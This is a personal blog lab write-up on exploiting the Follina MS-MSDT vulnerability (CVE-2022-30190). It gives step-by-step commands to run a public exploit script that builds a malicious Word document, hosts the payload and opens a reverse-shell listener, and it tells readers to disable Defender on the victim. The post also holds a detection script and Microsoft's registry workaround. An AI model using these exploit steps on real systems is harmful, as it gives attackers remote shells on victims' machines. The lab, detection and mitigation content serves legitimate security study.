Matthew McCorkle

Zero-Day CVE-2022-30190 MS-MSDT Follina

1. Introduction
2. My Setup
3. Exploit in Action!
4. Mitigations


This post walks through exploiting the CVE-2022-30190 MS-MSDT (Follina) vulnerability in an isolated lab!


1. Introduction

I want to give thanks and credit to John Hammond and his work with the Huntress team in identifying and showing exactly how this vulnerability can be exploited! Check out his YouTube channel or the Huntress blog.


2. My Setup

For my attack computer, I ran Kali Linux in VMware Workstation 16 Player using NAT and host-only virtual Ethernet adapters.

I ran my victim computer as an evaluation Windows 11 virtual machine in VMware Workstation 16 Player using a host-only virtual Ethernet adapter.


3. Exploit in Action!

John Hammond made the exploit accessible through his msdt-follina GitHub repository as a simple Python script. The script generates the malicious Word document, starts an HTTP server that hosts the HTML payload the document references, and, when run with -r, opens a netcat listener for the reverse shell.

Before starting the exploit:

The machine hosting these virtual machines probably runs its own anti-malware and Defender services. They may quarantine the generated document, or the Python script itself, as soon as you copy it into or between the virtual machines. At your discretion, you may need to exclude the lab directory or turn those services off to see the exploit work end to end.

Proceed at your own risk.

On Attack Device

Step 1: Clone the repository and change into it

git clone https://github.com/JohnHammond/msdt-follina.git
cd msdt-follina

Step 2: Generate the document, host the payload and start the listener. The script file is lowercase (follina.py), which matters on Linux. The port given to -r is the reverse-shell listener; the HTTP server that serves the payload uses its own port (8000 by default, see the script's --help for the option to change it).

python3 follina.py -r <port number of choice>

On victim

Step 3: Disable Windows Defender Real-Time Protection (Windows Security > Virus & threat protection > Manage settings), otherwise the payload is blocked before msdt.exe ever runs.

Step 4: Open PowerShell

Step 5: Request the payload page from the attack device. Use the port of the HTTP server the script started (8000 by default), not the -r listener port from step 2; a request to the netcat listener returns nothing useful. In Windows PowerShell, wget is an alias for Invoke-WebRequest, which parses the returned HTML with the Internet Explorer engine, so fetching the page is enough to follow its ms-msdt: redirect. In a real attack the same page is pulled in when the victim opens follina.doc in Word, because the document's external OLE relationship points at it.

wget http://<attackerIP>:<HTTP server port>

You should see the Microsoft Support Diagnostic Tool (msdt.exe) window appear on the victim, and shortly afterwards the listener on the attack computer receives the reverse-shell connection. If nothing happens, check that real-time protection is really off and that the port in the URL is the HTTP server's, not the listener's.

That's it! You are in!

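The malicious document and the page it fetches are the two artifacts this chain leaves behind, so here is a small triage script for them. It is an added example, not code from the post or from the msdt-follina project: it opens an OOXML document as a zip, reads word/_rels/document.xml.rels, and flags any relationship with TargetMode="External" whose target is an http(s) URL (Follina uses an oleObject relationship of that kind), and separately checks an HTML file for the ms-msdt: redirect and its MSDT parameter names. The two file paths in the usage lines are assumed sample locations.

```powershell
# Added example (not part of the post or the msdt-follina project): triage the two
# artifacts of the exploit chain. A Follina document is an OOXML zip whose
# word/_rels/document.xml.rels carries an oleObject relationship with
# TargetMode="External" pointing at the attacker's web server; the HTML it fetches
# redirects to an ms-msdt: URL. File paths in the usage lines are assumed locations.
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Find-ExternalOleTargets {
    param([Parameter(Mandatory)][string]$Path)

    $findings = @()
    # Only OOXML (.docx, or a .doc that is really OOXML) is a zip; a binary .doc is not handled here
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        $entry = $zip.GetEntry('word/_rels/document.xml.rels')
        if ($null -eq $entry) { return $findings }

        $reader = New-Object System.IO.StreamReader($entry.Open())
        try { [xml]$rels = $reader.ReadToEnd() } finally { $reader.Dispose() }

        foreach ($rel in $rels.Relationships.Relationship) {
            # Legitimate documents rarely carry an external relationship over HTTP; flag every one
            if ($rel.TargetMode -eq 'External' -and $rel.Target -match '^https?://') {
                $findings += [pscustomobject]@{
                    Id     = $rel.Id
                    Type   = ($rel.Type -split '/')[-1]   # 'oleObject' in the Follina case
                    Target = $rel.Target
                }
            }
        }
    } finally { $zip.Dispose() }
    return $findings
}

function Test-MsdtPayload {
    param([Parameter(Mandatory)][string]$Path)
    # The payload page redirects to ms-msdt:/id PCWDiagnostic ... with the command
    # smuggled through the IT_BrowseForFile / IT_RebrowseForFile parameters
    $html = Get-Content -Raw -Path $Path
    return [bool](($html -match 'ms-msdt:') -and ($html -match 'PCWDiagnostic|IT_BrowseForFile|IT_RebrowseForFile'))
}

# Usage (paths are assumptions; run on a copy of the artifacts, not the live lab victim):
Find-ExternalOleTargets -Path 'C:\lab\follina.doc' | Format-Table -AutoSize
Test-MsdtPayload -Path 'C:\lab\index.html'
```

The relationship check is the more durable of the two: the HTML can be obfuscated, but the document has to reference an external target for the chain to start, so an oleObject relationship with an http(s) target is worth an alert on its own.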

4. Mitigations

See Microsoft's guidance for the issue. Their interim workaround was to disable the ms-msdt URL protocol handler: export HKEY_CLASSES_ROOT\ms-msdt as a backup, then delete the key, and import the backup again once a fix is installed. Microsoft's guidance also notes that Defender with cloud-delivered protection detects and blocks the payload, and that Office's Protected View and Application Guard for Office prevent the document from reaching the handler, with the exception of RTF files rendered through the Explorer preview pane. A patch shipped in the June 14, 2022 Windows security updates.
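The registry workaround above, as an added example that is not part of the post. It applies the protocol-handler removal with a verified backup first, offers a check that the handler is gone, and can restore the key once the update is installed. It must run from an elevated PowerShell; the backup path is an assumed location.

```powershell
# Added example (not part of the post): apply and verify Microsoft's published
# workaround for CVE-2022-30190, which disables the ms-msdt: URL protocol handler by
# deleting its registry key after exporting a backup. Run from an elevated PowerShell.
# $BackupPath is an assumed location.
$BackupPath = Join-Path $env:SystemDrive 'ms-msdt-backup.reg'
$Key = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'

function Disable-MsdtProtocol {
    param([string]$Backup = $BackupPath)

    if (-not (Test-Path $Key)) {
        Write-Host 'ms-msdt handler is already absent; nothing to do'
        return
    }
    # Export first so the handler can be restored after the patch is installed;
    # refuse to delete anything if the backup did not succeed
    reg export HKEY_CLASSES_ROOT\ms-msdt $Backup /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "backup to $Backup failed; the key was not deleted" }
    reg delete HKEY_CLASSES_ROOT\ms-msdt /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'reg delete failed; the handler is still registered' }
}

function Test-MsdtProtocolDisabled {
    # True when no ms-msdt: handler is registered, i.e. the workaround is in place
    return -not (Test-Path $Key)
}

function Restore-MsdtProtocol {
    param([string]$Backup = $BackupPath)
    # Undo the workaround once the fixed Windows update is installed
    reg import $Backup | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "import of $Backup failed" }
}

# Usage:
Disable-MsdtProtocol
Test-MsdtProtocolDisabled
```

Removing the key also breaks legitimate troubleshooter links that use ms-msdt:, which is why the backup and the restore function matter; once the patched update is on the machine, run Restore-MsdtProtocol and re-check with Test-MsdtProtocolDisabled.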